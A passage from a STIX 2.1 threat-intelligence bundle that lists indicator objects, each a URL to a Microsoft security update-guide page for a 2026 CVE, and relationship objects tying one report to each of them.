    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2b694eb-c8bc-5425-a831-896fcf30fda3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--c3bb9f3c-ba23-5125-bc81-225fb059277b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8d3effbc-ae8d-5993-b012-b1c6c1fed07e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11010",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11010']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81a1ce4b-d8dc-58b7-baad-452722a728db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--8d3effbc-ae8d-5993-b012-b1c6c1fed07e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b400c21c-8a99-5f58-94d0-a055653a1de3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11012",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11012']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--304e8511-f01c-5ab9-a9cc-09d49a7aa118",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--b400c21c-8a99-5f58-94d0-a055653a1de3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7c884517-7389-5a0c-9937-2cae9ac3bd25",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11019",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11019']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c407d815-59ea-5918-9a18-6f1249c3cba2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--7c884517-7389-5a0c-9937-2cae9ac3bd25"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a7bd3003-320f-5a3c-bd98-8d3115e9ce0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11029",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11029']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6ee4a31f-4e9e-580b-beca-a17139b8fbf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--a7bd3003-320f-5a3c-bd98-8d3115e9ce0d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0d98f3f4-25ce-578c-9df4-a5dee3d9c206",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11034",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11034']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2feb4876-142b-570a-8c7b-2bb823708eb5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--0d98f3f4-25ce-578c-9df4-a5dee3d9c206"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59bc0431-89b1-561a-8984-3705d049463e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11035",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11035']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1128ff9b-3535-5edc-b079-91831362b5d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--59bc0431-89b1-561a-8984-3705d049463e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--80911274-831e-52b8-aa8f-b7a116aba8b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11045",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11045']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd963158-7ae3-552b-aa51-00a7952a086b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--80911274-831e-52b8-aa8f-b7a116aba8b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d62c751e-a60b-5191-89a6-c9373160ac7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11064",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11064']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a5728713-e625-55db-b112-d28655fb002b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--d62c751e-a60b-5191-89a6-c9373160ac7c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--97d61afe-a753-5a69-9ad2-66994e098b12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11065",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11065']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a281e4c-1d4a-5739-bdff-5bedd8ca3d2f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--97d61afe-a753-5a69-9ad2-66994e098b12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bfdf75ef-b6ae-5990-b1fd-3e42984c5ef9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11072",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11072']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63065732-ab30-5ee1-b666-a29f0c2251b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--bfdf75ef-b6ae-5990-b1fd-3e42984c5ef9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--006f2c2b-92af-5b97-a008-1fd2ea0f2e3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11077",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11077']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51bad10b-8480-5e49-b87f-c50b687623fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--006f2c2b-92af-5b97-a008-1fd2ea0f2e3b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8be36e57-9a30-5f8b-8845-48b250464662",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11080",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11080']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c6333237-6abc-566b-b08e-2742007f19c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--8be36e57-9a30-5f8b-8845-48b250464662"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f90494ef-f414-5db1-bc67-144377e0eec4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11082",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11082']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d922ac2a-57a6-5cbc-979a-525b680534f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--f90494ef-f414-5db1-bc67-144377e0eec4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--98c0f959-ed7b-54cb-bc5f-663bef27fad2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11097",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11097']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e66bd35d-e79b-56aa-a5d1-6fcc3d05c5ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--98c0f959-ed7b-54cb-bc5f-663bef27fad2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--78b7dca8-a343-507d-a3a8-4d61ff61d6e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11108",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11108']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1356973e-1890-5ceb-8bc4-28a9033ef5e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--78b7dca8-a343-507d-a3a8-4d61ff61d6e1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f644602e-834d-509a-862f-8511af1831d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11119",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11119']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1745b79-e4e9-5424-88c1-4e400e39bd2c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--f644602e-834d-509a-862f-8511af1831d6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--96da5688-b587-5746-a58e-52cf705b88b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11127",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11127']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4be75433-d5a6-5eb5-9981-41ea4632eb3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--96da5688-b587-5746-a58e-52cf705b88b3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41e1b348-9795-5f60-8245-7d5d3bc82c65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11131",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11131']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd03be07-3735-51db-84b7-f533ecea3844",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--41e1b348-9795-5f60-8245-7d5d3bc82c65"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5b1417a3-4730-5746-8e3a-b522b9db5fb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11145",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11145']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d0e534f-4253-5b9a-868e-ce8820636859",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--5b1417a3-4730-5746-8e3a-b522b9db5fb6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8ac2bd85-bbe2-5d88-9292-15d49b1d85b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11148",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11148']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f4a0152b-2766-5c21-a71c-01ea96ec7f27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--8ac2bd85-bbe2-5d88-9292-15d49b1d85b6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5677d4ba-c0c1-5317-bd4e-05a768f69486",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11163",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11163']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b523cc43-a298-5ae0-bccd-7305b61a09d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--5677d4ba-c0c1-5317-bd4e-05a768f69486"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1bfb121c-abc2-5949-94f8-1b43f4654a3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11167",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11167']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd7a53bc-11ec-57dd-ac05-b3e078055a7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--1bfb121c-abc2-5949-94f8-1b43f4654a3c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9a63e904-12b9-53c9-a44e-7118a00498a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11172",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11172']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f9d3a9e-6f77-5753-8227-d442b83f04ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--9a63e904-12b9-53c9-a44e-7118a00498a0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f6c2027d-6fca-510c-aa21-9b0c767bb47b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11175",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11175']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7726ad96-d5af-545b-ab18-c6c49f3f7f65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--f6c2027d-6fca-510c-aa21-9b0c767bb47b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d25563d4-a10c-5493-8345-ad28f0b043a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11178",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11178']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b83e11a6-5ea6-53e6-9e32-ac9d53c1994d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--d25563d4-a10c-5493-8345-ad28f0b043a9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7cb63911-9a42-521e-8f64-ccf2fc4fbdd3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11188",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11188']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--45f036e5-c73d-5b83-b8b7-e505a8df4109",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--7cb63911-9a42-521e-8f64-ccf2fc4fbdd3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22a0c270-4876-5a4a-9e20-18e81d112388",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11215",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11215']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--178b8372-48ce-5e81-a2ca-0220bd0bcdf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--22a0c270-4876-5a4a-9e20-18e81d112388"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--056b3d84-2e7d-503a-9690-630e99d9207a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11226",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11226']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d53f0cc-4139-5af3-b802-da68470282ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--056b3d84-2e7d-503a-9690-630e99d9207a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eed8f5c8-859c-5928-b71d-5292eb2296cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11247",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11247']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0e5da095-4891-50ee-9def-5b92afedb7c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--eed8f5c8-859c-5928-b71d-5292eb2296cb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5a332c80-4579-5c45-8afd-f0585b2d0ef7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11263",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11263']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f545c20d-4d59-5cf1-a303-f29565e5b0fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--5a332c80-4579-5c45-8afd-f0585b2d0ef7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e936896e-10ff-5feb-823d-33c8a690d4cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11270",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11270']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32f00ffa-bef4-5a16-a0f4-46ae37429e96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--e936896e-10ff-5feb-823d-33c8a690d4cc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b4456664-5af3-5d99-9ed0-a9a6d75c7644",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11278",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11278']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7210e502-cb74-5122-8539-2838d86fbc7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--b4456664-5af3-5d99-9ed0-a9a6d75c7644"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aaf83944-14f8-5e7f-a388-5f7ee6f11ef0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11287",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11287']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2731f1d-a286-5981-a2e3-dae4d0676f1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--aaf83944-14f8-5e7f-a388-5f7ee6f11ef0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f8627e06-405f-57e5-a8b8-ebeb7bb9601c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11290",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11290']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--29dbe3a3-832a-56d8-9374-4ece6d016de7",
      "created": "2026-07-09T17:20:22Z",
